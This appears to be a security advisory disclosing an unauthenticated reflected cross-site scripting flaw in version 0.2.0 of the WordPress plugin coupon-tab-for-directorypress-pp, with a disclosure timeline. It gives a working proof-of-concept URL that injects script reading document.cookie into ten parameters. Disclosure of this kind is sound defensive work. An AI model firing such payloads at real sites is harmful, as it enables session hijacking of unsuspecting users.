wp-plugin : coupon-tab-for-directorypress-pp

Plugin Details
Plugin Name: wp-plugin : coupon-tab-for-directorypress-pp
Effected Version : 0.2.0 (and most probably lower version's if any)
Vulnerability : Cross-Site Scripting (XSS)
Identified by : anantshri
WPScan Reference URL

Technical Details
Minimum Level of Access Required : Unauthenticated
PoC - (Proof of Concept) :
http://localhost/wp-content/plugins/coupon-tab-for-directorypress-pp/pp-coupon-popup.php?cfh=</style><script>alert(document.cookie)</script>&cc=cc'><script>alert(document.cookie)</script>&cb=cb'><script>alert(document.cookie)</script>&cfd=cfd&ce=ce'><script>alert(document.cookie)</script>&cd=cd'><script>alert(document.cookie)</script>&cdt=cdt'><script>alert(document.cookie)</script>&cdet=cdet'><script>alert(document.cookie)</script>&cs=cs'><script>alert(document.cookie)</script>&cfw=cfw'></style><script>alert(document.cookie)</script>&surl=surl'><script>alert(document.cookie)</script>&

 

Vulnerable Parameter : cfh, cc, cb, cd, ce, cdt, cdet, cs, cfw, surl

 

Type of XSS : Reflected


Disclosure Timeline
Vendor Contacted : 2014-01-04
Plugin Status : Updated on
Public Disclosure : July 7, 2014
CVE Number :
Plugin Description :
[| Coupon Tab (pp-coupon-tab) creates a new tab on the directory listing page of Directory Press. This tab is titled "Coupon" and displays the coupons listed by the registered users. This plugin requires DirectoryPress and has been tested till version 7.1.3 with a slight modification. Please check installtion notes for details. ]